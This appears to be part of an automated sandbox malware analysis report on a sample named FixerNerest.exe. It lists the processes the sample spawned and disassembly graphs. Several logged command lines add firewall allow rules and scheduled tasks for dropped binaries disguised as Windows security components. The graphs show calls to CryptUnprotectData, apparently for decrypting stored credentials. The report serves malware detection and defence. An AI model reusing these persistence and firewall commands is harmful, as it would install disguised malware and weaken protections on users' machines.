                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                                                                                                                                                                                                                                              Imagebase:0x5f0000
                                                                                                                                                                                                                                              File size:398'579 bytes
                                                                                                                                                                                                                                              MD5 hash:094EBE271C9334745C238FC2BA77FD38
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                              Imagebase:0x7ff64dca0000
                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit
                                                                                                                                                                                                                                              Imagebase:0x7ff6fd8a0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff771540000
                                                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                              Imagebase:0x7ff6fd8a0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff789eb0000
                                                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                                                                                                                                                                                                                                              Imagebase:0x7ff679410000
                                                                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                                                                              MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                              Imagebase:0x7ff6fd8a0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff771540000
                                                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                                                                                                                                                                                                                                              Imagebase:0x7ff679410000
                                                                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                                                                              MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\xdwdSecurityHealthSystrays.exe"
                                                                                                                                                                                                                                              Imagebase:0x430000
                                                                                                                                                                                                                                              File size:735'522'883 bytes
                                                                                                                                                                                                                                              MD5 hash:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                                                                                                                                                                                                                                              Imagebase:0x7ff6fd8a0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff771540000
                                                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                              Imagebase:0x7ff6fd8a0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff771540000
                                                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:05:25:05
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                                                                                                                                                                                                                                              Imagebase:0x7ff679410000
                                                                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                                                                              MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:05:25:06
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Imagebase:0x290000
                                                                                                                                                                                                                                              File size:735'522'883 bytes
                                                                                                                                                                                                                                              MD5 hash:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                              Start time:05:25:07
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\Defender.exe"
                                                                                                                                                                                                                                              Imagebase:0x5c0000
                                                                                                                                                                                                                                              File size:753'276'147 bytes
                                                                                                                                                                                                                                              MD5 hash:6C49C48E82A1B13AC0406AD8B049E7DE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:05:25:08
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                              File size:735'522'883 bytes
                                                                                                                                                                                                                                              MD5 hash:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:05:25:11
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                                                                                                                              File size:753'276'147 bytes
                                                                                                                                                                                                                                              MD5 hash:6C49C48E82A1B13AC0406AD8B049E7DE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:05:26:02
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              Imagebase:0x920000
                                                                                                                                                                                                                                              File size:735'522'883 bytes
                                                                                                                                                                                                                                              MD5 hash:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:05:26:02
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                              Imagebase:0x380000
                                                                                                                                                                                                                                              File size:753'276'147 bytes
                                                                                                                                                                                                                                              MD5 hash:6C49C48E82A1B13AC0406AD8B049E7DE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:6.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:5.5%
                                                                                                                                                                                                                                                Total number of Nodes:110
                                                                                                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                                                                                                execution_graph 25379 29cd178 25380 29cd1be GetCurrentProcess 25379->25380 25382 29cd209 25380->25382 25383 29cd210 GetCurrentThread 25380->25383 25382->25383 25384 29cd24d GetCurrentProcess 25383->25384 25385 29cd246 25383->25385 25386 29cd283 25384->25386 25385->25384 25387 29cd2ab GetCurrentThreadId 25386->25387 25388 29cd2dc 25387->25388 25389 29c4668 25390 29c4684 25389->25390 25391 29c4696 25390->25391 25395 29c47a0 25390->25395 25400 29c3e10 25391->25400 25396 29c47c5 25395->25396 25404 29c48b0 25396->25404 25408 29c48a1 25396->25408 25401 29c3e1b 25400->25401 25416 29c5c54 25401->25416 25403 29c46b5 25406 29c48d7 25404->25406 25405 29c49b4 25406->25405 25412 29c4248 25406->25412 25409 29c48b0 25408->25409 25410 29c49b4 25409->25410 25411 29c4248 CreateActCtxA 25409->25411 25411->25410 25413 29c5940 CreateActCtxA 25412->25413 25415 29c5a03 25413->25415 25417 29c5c5f 25416->25417 25420 29c5c64 25417->25420 25419 29c709d 25419->25403 25421 29c5c6f 25420->25421 25424 29c5c94 25421->25424 25423 29c717a 25423->25419 25425 29c5c9f 25424->25425 25428 29c5cc4 25425->25428 25427 29c726d 25427->25423 25429 29c5ccf 25428->25429 25436 29c80dc 25429->25436 25431 29c8468 25433 29c8653 25431->25433 25440 29cadc0 25431->25440 25432 29c8691 25432->25427 25433->25432 25444 29ccea0 25433->25444 25437 29c80e7 25436->25437 25439 29c9909 25437->25439 25449 29c8324 25437->25449 25439->25431 25453 29cadf8 25440->25453 25456 29cade7 25440->25456 25441 29cadd6 25441->25433 25445 29cced1 25444->25445 25446 29ccef5 25445->25446 25465 29cd060 25445->25465 25469 29cd051 25445->25469 25446->25432 25450 29c9a68 FindWindowW 25449->25450 25452 29c9aed 25450->25452 25452->25439 25460 29caef0 25453->25460 25454 29cae07 25454->25441 25457 29cadf8 25456->25457 25459 29caef0 GetModuleHandleW 25457->25459 25458 29cae07 25458->25441 25459->25458 25461 29caf24 25460->25461 25462 29caf01 25460->25462 25461->25454 25462->25461 25463 29cb128 GetModuleHandleW 25462->25463 25464 29cb155 25463->25464 25464->25454 25467 29cd06d 25465->25467 25466 29cd0a7 25466->25446 25467->25466 25473 29cc9a0 25467->25473 25471 29cd060 25469->25471 25470 29cd0a7 25470->25446 25471->25470 25472 29cc9a0 2 API calls 25471->25472 25472->25470 25474 29cc9ab 25473->25474 25476 29cd9b8 25474->25476 25477 29ccacc 25474->25477 25476->25476 25478 29ccad7 25477->25478 25479 29c5cc4 2 API calls 25478->25479 25480 29cda27 25479->25480 25480->25476 25481 623adb8 25482 623ade5 25481->25482 25483 623af9b 25482->25483 25486 623b129 25482->25486 25491 623b138 25482->25491 25487 623b15f 25486->25487 25488 623b1ab 25487->25488 25496 623b7e8 25487->25496 25504 623b7d8 25487->25504 25488->25483 25492 623b15f 25491->25492 25493 623b1ab 25492->25493 25494 623b7e8 CryptUnprotectData 25492->25494 25495 623b7d8 CryptUnprotectData 25492->25495 25493->25483 25494->25493 25495->25493 25497 623b80d 25496->25497 25500 623b8c1 25496->25500 25497->25500 25502 623b7e8 CryptUnprotectData 25497->25502 25503 623b7d8 CryptUnprotectData 25497->25503 25512 623b9cb 25497->25512 25516 623b670 25500->25516 25502->25500 25503->25500 25505 623b7e8 25504->25505 25506 623b8c1 25505->25506 25509 623b9cb CryptUnprotectData 25505->25509 25510 623b7e8 CryptUnprotectData 25505->25510 25511 623b7d8 CryptUnprotectData 25505->25511 25507 623b670 CryptUnprotectData 25506->25507 25508 623ba8d 25507->25508 25508->25488 25509->25506 25510->25506 25511->25506 25513 623b9dd 25512->25513 25514 623b670 CryptUnprotectData 25513->25514 25515 623ba8d 25514->25515 25515->25500 25517 623bc78 CryptUnprotectData 25516->25517 25518 623ba8d 25517->25518 25518->25488 25519 29cd3c0 DuplicateHandle 25520 29cd456 25519->25520

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 0623ADB8 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 248 623adb8-623ade3 249 623ade5 248->249 250 623adea-623ae3c 248->250 249->250 252 623ae60-623ae62 250->252 253 623ae3e-623ae5e 250->253 254 623ae65-623ae70 252->254 253->254 256 623ae76-623af93 254->256 257 623b03f-623b063 254->257 287 623af95 call 623b129 256->287 288 623af95 call 623b138 256->288 262 623b064-623b092 257->262 276 623af9b-623b023 call 62376a8 * 2 285 623b026 call 623ca20 276->285 286 623b026 call 623ca50 276->286 284 623b02c-623b03d 284->262 285->284 286->284 287->276 288->276
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 1$v
                                                                                                                                                                                                                                                • API String ID: 0-2456183578
                                                                                                                                                                                                                                                • Opcode ID: a818690c72e82aa63db61e810bd30c2ab9494bd927ece9b91457c3d625236891
                                                                                                                                                                                                                                                • Instruction ID: ca153b3f0f208ebf10926cc937cf7c133d44fde2d0c4c52758836b0ae4d6748a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a818690c72e82aa63db61e810bd30c2ab9494bd927ece9b91457c3d625236891
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47919374E01218CFDB68DFA9D994B9DBBB2FF89301F1480AAD809AB355DB315981CF50
                                                                                                                                                                                                                                                Function 0623ADA8 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 289 623ada8-623ade3 291 623ade5 289->291 292 623adea-623ae3c 289->292 291->292 294 623ae60-623ae62 292->294 295 623ae3e-623ae5e 292->295 296 623ae65-623ae70 294->296 295->296 298 623ae76-623af79 296->298 299 623b03f-623b063 296->299 317 623af7f-623af93 298->317 304 623b064-623b092 299->304 329 623af95 call 623b129 317->329 330 623af95 call 623b138 317->330 318 623af9b-623afad 319 623afb8-623b009 call 62376a8 * 2 318->319 325 623b00e-623b023 319->325 327 623b026 call 623ca20 325->327 328 623b026 call 623ca50 325->328 326 623b02c-623b03d 326->304 327->326 328->326 329->318 330->318
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 1$v
                                                                                                                                                                                                                                                • API String ID: 0-2456183578
                                                                                                                                                                                                                                                • Opcode ID: 8c7d7d330c4db7977220828ee5774bd23a43107196fa82baf34377a0b075e0fd
                                                                                                                                                                                                                                                • Instruction ID: c101898b915b0bed503eaa813934deb40a856fa2d10c162cd730f402c1451361
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c7d7d330c4db7977220828ee5774bd23a43107196fa82baf34377a0b075e0fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19919374E01228CFDB64DFA9D954B9DBBB2FF89300F1080AAD859AB355DB315981CF50
                                                                                                                                                                                                                                                Function 0623DBD8 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 430 623dbd8-623dc0a 431 623dc11-623dc9a 430->431 432 623dc0c 430->432 434 623dca8-623dcc1 431->434 435 623dc9c-623dca0 431->435 432->431 437 623dcca-623dcd5 434->437 435->434 436 623dca2-623dca6 435->436 436->434 438 623dcc3 436->438 439 623dcd7-623dd0e 437->439 440 623dd19-623dd61 437->440 438->437 439->440 443 623ddb4-623ddcd 440->443 444 623dd63-623ddb3 443->444 445 623ddcf-623dde9 443->445 444->443 447 623df35-623df48 445->447 450 623ddee-623de2c 447->450 451 623df4e-623df61 447->451 460 623de8a-623de8e 450->460 461 623de2e-623de55 450->461 452 623df67-623df70 451->452 453 623e02e-623e04a 451->453 455 623e00e-623e027 452->455 458 623df75-623df7c 455->458 459 623e02d 455->459 462 623dff3-623e004 458->462 459->453 463 623de90-623dea4 460->463 464 623dea6-623dea8 460->464 471 623de5e-623de75 461->471 467 623e00a-623e00b 462->467 468 623df7e-623dff0 462->468 466 623deab-623deb6 463->466 464->466 469 623ded2-623df32 466->469 470 623deb8-623ded1 466->470 467->455 468->462 469->447 470->469 474 623de77 471->474 475 623de7c-623de88 471->475 474->475 475->469
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Hq
